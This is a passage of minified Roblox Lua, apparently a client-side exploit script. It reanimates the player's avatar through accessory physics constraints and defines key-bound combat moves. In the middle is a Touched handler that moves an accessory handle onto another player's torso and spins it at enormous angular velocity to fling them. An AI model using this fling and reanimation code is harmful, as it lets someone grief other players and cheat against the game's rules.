ation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.3*fG,-0.6*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(-25),RAD(15),RAD(15)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.65,0)*ANGLES(RAD(170),RAD(0),RAD(-13))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(0),RAD(0),RAD(-3))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)end end;no()l=16;mT=false;mB=false;mF=false end;function TakeOn()mB=true;mF=true;coroutine.resume(coroutine.create(function()repeat Swait()RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(-5+2*SIN(mG/12)),RAD(15),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.3*fG,-0.6*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)until mB==false end))CreateSound(1535994669,Head,10,1,false)for T=0,1,0.1/Animation_Speed do Swait()RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(35),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(170),RAD(0),RAD(-25))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.35,0.5,0.2)*ANGLES(RAD(-25),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(80),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)end;for T=0,1,0.1/Animation_Speed do Swait()RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(-10),RAD(0),RAD(35)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(130),RAD(0),RAD(0))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.35,0.5,0.2)*ANGLES(RAD(-25),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(0),RAD(80),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-80),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)end;mB=false;mF=false end;function MouseDown(Mouse)if mB==false then end end;function MouseUp(Mouse)mD=false end;function KeyDown(n_)mH=true;if n_=="z"and mB==false then blim=true;Punch()blim=false end;if n_=="e"and mB==false and mT==false then Throw()end;if n_=="r"and mB==false and mT==false then blim=true;Uppercut()blim=false end;if n_=="t"and mB==false then Roar()end;if n_=="y"and mB==false then TakeOn()end end;function KeyUp(n_)mH=false end;Mouse.Button1Down:connect(function(nW)MouseDown(nW)end)Mouse.Button1Up:connect(function(nW)MouseUp(nW)end)Mouse.KeyDown:connect(function(nW)KeyDown(nW)end)Mouse.KeyUp:connect(function(nW)KeyUp(nW)end)function unanchor()for U,c in pairs(Character:GetChildren())do if c:IsA("BasePart")and c~=RootPart then c.Anchored=false end end;if mQ==true then RootPart.Anchored=false else RootPart.Anchored=true end end;Humanoid.Changed:connect(function(o0)if o0=="Jump"and Disable_Jump==true then Humanoid.Jump=false end end)coroutine.resume(coroutine.create(function()while true do Swait()mG=mG+mI end end))coroutine.resume(coroutine.create(function()while true do Swait()mP.Parent=nil;for U,v in next,Humanoid:GetPlayingAnimationTracks()do v:Stop()end;local o1=(RootPart.Velocity*VT(1,0,1)).magnitude;local o2=RootPart.Velocity.y;local nN=Raycast(RootPart.Position,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,4,Character)local o3=4;if mA=="Walk"and o1>1 then RootJoint.C1=Clerp(RootJoint.C1,mv*CF(0,0,-0.05*COS(mG/(o3/2)))*ANGLES(RAD(0),RAD(0)-RootPart.RotVelocity.Y/75,RAD(0)),2*Humanoid.WalkSpeed/16/Animation_Speed)Neck.C1=Clerp(Neck.C1,CF(0,-0.5,0)*ANGLES(RAD(-90),RAD(0),RAD(180))*ANGLES(RAD(2.5*SIN(mG/(o3/2))),RAD(0),RAD(0)-Head.RotVelocity.Y/30),0.2*Humanoid.WalkSpeed/16/Animation_Speed)RightHip.C1=Clerp(RightHip.C1,CF(0.5,0.875-0.125*SIN(mG/o3)-0.15*COS(mG/o3*2),-0.125*COS(mG/o3)+0.2-0.2*COS(mG/o3))*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0)-RightLeg.RotVelocity.Y/75,RAD(0),RAD(76*COS(mG/o3))),0.4*Humanoid.WalkSpeed/16/Animation_Speed)LeftHip.C1=Clerp(LeftHip.C1,CF(-0.5,0.875+0.125*SIN(mG/o3)-0.15*COS(mG/o3*2),0.125*COS(mG/o3)+0.2+0.2*COS(mG/o3))*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0)+LeftLeg.RotVelocity.Y/75,RAD(0),RAD(76*COS(mG/o3))),0.4*Humanoid.WalkSpeed/16/Animation_Speed)elseif mA~="Walk"or o1<1 then RootJoint.C1=Clerp(RootJoint.C1,mv*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(0)),0.2/Animation_Speed)Neck.C1=Clerp(Neck.C1,CF(0,-0.5,0)*ANGLES(RAD(-90),RAD(0),RAD(180))*ANGLES(RAD(0),RAD(0),RAD(0)),0.2/Animation_Speed)RightHip.C1=Clerp(RightHip.C1,CF(0.5,1,0)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),0.2/Animation_Speed)LeftHip.C1=Clerp(LeftHip.C1,CF(-0.5,1,0)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),0.2/Animation_Speed)end;if o2>1 and nN==nil then mA="Jump"if mB==false then RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(15))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-15))*my,1/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.4*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.4*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(-35),RAD(0),RAD(25+10*COS(mG/12)))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(-35),RAD(0),RAD(-25-10*COS(mG/12)))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.4,-0.6)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-85),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end elseif o2<-1 and nN==nil then mA="Fall"if mB==false then RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(80))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(0),RAD(0),RAD(-80))*my,1/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.4*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.4*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(15),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(15),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(35-4*COS(mG/6)),RAD(0),RAD(45+10*COS(mG/12)))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(35-4*COS(mG/6)),RAD(0),RAD(-45-10*COS(mG/12)))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-0.3,-0.7)*ANGLES(RAD(-25+5*SIN(mG/12)),RAD(90),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-0.8,-0.3)*ANGLES(RAD(-10),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end elseif o1<1 and nN~=nil then mA="Idle"if mB==false then RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(-5+2*SIN(mG/12)),RAD(15),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.3*fG,-0.6*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0+0.05*COS(mG/12))*ANGLES(RAD(0),RAD(0),RAD(-15)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0-2.5*SIN(mG/12)),RAD(0),RAD(15)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5+0.05*SIN(mG/12),0)*ANGLES(RAD(0),RAD(0),RAD(3))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.35,0.5,0.2)*ANGLES(RAD(-25),RAD(0),RAD(45))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1.1,-1-0.05*COS(mG/12),-0.2)*ANGLES(RAD(0),RAD(100),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1-0.05*COS(mG/12),0)*ANGLES(RAD(0),RAD(-70),RAD(0))*ANGLES(RAD(0),RAD(-2),RAD(0)),1/Animation_Speed)end elseif o1>1 and nN~=nil then mA="Walk"if mB==false then RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0.25*COS(mG/12))*ANGLES(RAD(35+2*SIN(mG/12)),RAD(0),RAD(35)),0.5/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-25-2*SIN(mG/12)),RAD(0),RAD(-35)),0.5/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(60))*mx,0.5/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-35+15*SIN(mG/12)),RAD(0),RAD(-60))*my,0.5/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-1*fG,0)*ANGLES(RAD(0),RAD(80-1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.5*fG,-0.3*fG)*ANGLES(RAD(-25),RAD(-80+1*SIN(mG/6)),RAD(0))*ANGLES(RAD(-3*SIN(mG/12)),RAD(0),RAD(0)),0.5/Animation_Speed)RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,-0.05)*ANGLES(RAD(5),RAD(0),RAD(0)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(5-1*SIN(mG/(o3/2))),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(30*COS(mG/o3)),RAD(0),RAD(5))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(-30*COS(mG/o3)),RAD(0),RAD(-5))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,0)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(-15)),2/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,0)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(15)),2/Animation_Speed)end end;if mB==false then RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.1)end;unanchor()RootPart2.Anchored=true;Humanoid.MaxHealth=200;Humanoid.Health=200;if mF==false then Disable_Jump=false;Humanoid.WalkSpeed=l elseif mF==true then Disable_Jump=true;Humanoid.WalkSpeed=0 end;for U,c in pairs(mN:GetChildren())do if c:IsA("Part")then c.Color=C3(1,1,1)if c~=RootPart2 then c.Transparency=1 end;if c:FindFirstChildOfClass("Decal")then c:ClearAllChildren()end;c.CanCollide=false;c.Material="Neon"else c:remove()end end;mu.SoundId="rbxassetid://609005478"mu.Looped=true;mu.Pitch=1;mu.Volume=1.5;mu.Parent=Character;mu.Playing=mS;if mC==false then Intro()end end end))R.rightarm.Handle.Touched:connect(function(hit)local F=hit.Parent:findFirstChild("Torso")if F and F.Parent.Name~=L and F.Parent.Name~="giantstando"and blim==true then brug=false;bruhmom=false;pimbob=Instance.new("BodyAngularVelocity",pewhandle)pimbob.MaxTorque=Vector3.new(math.huge,math.huge,math.huge)pimbob.P=1000000000000000000000000000;pimbob.AngularVelocity=Vector3.new(10000000000000000000000000000000,100000000000000000000000000,100000000000000000)pewhandle.Position=hit.Parent:findFirstChild("Torso").Position;wait(0.5)pimbob:Destroy()brug=true;bruhmom=true end end)wait(0.25)for T,v in next,R do v.Handle.Anchored=true end;wait(0.75)for T,v in next,R do v.Handle.Anchored=false end;W(R.head.Handle,mN["Head"])W(R.torso.Handle,mN["Torso"])W(R.rightarm.Handle,mN["Right Arm"])W(R.leftarm.Handle,mN["Left Arm"])W(R.rightleg.Handle,mN["Right Leg"])W(R.leftleg.Handle,mN["Left Leg"])R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)Character.Effects:Destroy()end;function Clickey10()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;Character["Bang w bun"].Name="Bang w bun"Character["Bang w bun"].Name="Bang w bun1"Character["Bang w bun"].Name="Bang w bun2"Character["Doodle Devil Wings"].Name="Doodle Devil Wings1"local R={one=Character:WaitForChild("Doodle Devil Wings"),two=Character:WaitForChild("Bang w bun"),three=Character:WaitForChild("Doodle Devil Wings1"),four=Character:WaitForChild("Bang w bun1"),five=Character:WaitForChild("Batwings"),six=Character:WaitForChild("Bang w bun2"),seven=Character:WaitForChild("Galactic HairAccessory"),eight=Character:WaitForChild("BoyAnimeHair"),joint=Character:WaitForChild("PigAccessory"),joint1=Character:WaitForChild("MeshPartAccessory")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;rs=game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Destroy()rs.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part1=game:GetService("Players").LocalPlayer.Character["Right Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Arm"].Name="ra"rs.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["ra"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;ls=game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Destroy()ls.Parent=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part0=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part1=game:GetService("Players").LocalPlayer.Character["Left Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Arm"].Name="la"ls.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["la"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;rh=game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Destroy()rh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part1=game:GetService("Players").LocalPlayer.Character["Right Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Leg"].Name="rh"rh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["rh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;lh=game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Destroy()lh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part1=game:GetService("Players").LocalPlayer.Character["Left Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Leg"].Name="lh"lh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["lh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;coroutine.resume(coroutine.create(function()while true do wait(0.1)for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="rh"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="lh"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="ra"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="la"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="Tors"then v.Transparency=1 end end end end))wait()c3={}function c3.new(r,d,b)return Color3.new(r/255,d/255,b/255)end;primary=c3.new(0,0,0)secondary=c3.new(255,0,0)local player=game:GetService("Players").LocalPlayer;repeat wait()until player.Character;char=player.Character;basesound=Instance.new("Sound")basepart=Instance.new("Part")baseexplosion=Instance.new("Explosion")spawn(function()while wait()do if not basesound then print'basesound nil'basesound=Instance.new("Sound")end;if not baseexplosion then baseexplosion=Instance.new("Explosion")end;if not basepart then basepart=Instance.new("Part")end end end)CreateInstance=function()cors={}mas=Instance.new("Model",game:GetService("Lighting"))Model0=Instance.new("Model")Model1=Instance.new("Model")Part2=Instance.new("Part")Part3=Instance.new("Part")Motor6D4=Instance.new("Motor6D")Motor6D5=Instance.new("Motor6D")Part6=Instance.new("Part")Motor6D7=Instance.new("Motor6D")Part8=Instance.new("Part")Motor6D9=Instance.new("Motor6D")Model10=Instance.new("Model")Part11=Instance.new("Part")Part12=Instance.new("Part")Motor6D13=Instance.new("Motor6D")Motor6D14=Instance.new("Motor6D")Part15=Instance.new("Part")Motor6D16=Instance.new("Motor6D")Part17=Instance.new("Part")Motor6D18=Instance.new("Motor6D")Model19=Instance.new("Model")Part20=Instance.new("Part")Part21=Instance.new("Part")Motor6D22=Instance.new("Motor6D")Motor6D23=Instance.new("Motor6D")Part24=Instance.new("Part")Motor6D25=Instance.new("Motor6D")Part26=Instance.new("Part")Motor6D27=Instance.new("Motor6D")Model28=Instance.new("Model")Part29=Instance.new("Part")Part30=Instance.new("Part")Motor6D31=Instance.new("Motor6D")Motor6D32=Instance.new("Motor6D")Part33=Instance.new("Part")Motor6D34=Instance.new("Motor6D")Part35=Instance.new("Part")Motor6D36=Instance.new("Motor6D")Part37=Instance.new("Part")Motor6D38=Instance.new("Motor6D")Model0.Name="Bot"Model0.Parent=mas;Model1.Name="LeftLowerLeg"Model1.Parent=Model0;Part2.Name="Leg"Part2.Parent=Model1;Part2.Material=Enum.Material.Metal;Part2.BrickColor=BrickColor.new("Really black")Part2.Rotation=Vector3.new(0,45,-111.299995)Part2.CanCollide=false;Part2.Size=Vector3.new(6,1,1)Part2.CFrame=CFrame.new(32.2574959,2.97668099,10.4622593,-0.2568883,0.65879637,0.707109034,-0.931675911,-0.363295883,2.88365015e-07,0.256890744,-0.65879631,0.707109392)Part2.BottomSurface=Enum.SurfaceType.Smooth;Part2.TopSurface=Enum.SurfaceType.Smooth;Part2.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part2.Position=Vector3.new(32.2574959,2.97668099,10.4622593)Part2.Orientation=Vector3.new(0,45,-111.299995)Part2.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part3.Name="Base"Part3.Parent=Model1;Part3.Material=Enum.Material.Neon;Part3.BrickColor=BrickColor.new("Really red")Part3.Transparency=1;Part3.Rotation=Vector3.new(0,45,-21.2999992)Part3.CanCollide=false;Part3.Shape=Enum.PartType.Ball;Part3.Size=Vector3.new(1.10000002,1.10000002,1.10000002)Part3.CFrame=CFrame.new(36.3001213,3.82847285,6.41962528,0.65879637,0.2568883,0.707109034,-0.363295883,0.931675911,2.88365015e-07,-0.65879631,-0.256890744,0.707109392)Part3.BottomSurface=Enum.SurfaceType.Smooth;Part3.TopSurface=Enum.SurfaceType.Smooth;Part3.Color=Color3.new(1,0,0)Part3.Position=Vector3.new(36.3001213,3.82847285,6.41962528)Part3.Orientation=Vector3.new(0,45,-21.2999992)Part3.Color=Color3.new(1,0,0)Motor6D4.Name="Joint"Motor6D4.Parent=Part3;Motor6D4.C0=CFrame.new(-5,0,0,1,0,0,0,1,0,0,0,1)Motor6D4.C1=CFrame.new(-2.49999809,1.43051147e-06,0,1,0,0,0,1,0,0,0,1)Motor6D4.Part0=Part3;Motor6D4.Part1=Part6;Motor6D5.Parent=Part3;Motor6D5.C1=CFrame.new(-1.19987869,-0.671523809,0.419622421,0.658794224,0.256887913,0.707107604,-0.363295287,0.931674659,7.94126493e-07,-0.658793986,-0.256889552,0.707107425)Motor6D5.Part0=Part3;Motor6D5.Part1=Part37;Part6.Name="Leg2"Part6.Parent=Model1;Part6.Material=Enum.Material.Metal;Part6.BrickColor=BrickColor.new("Really 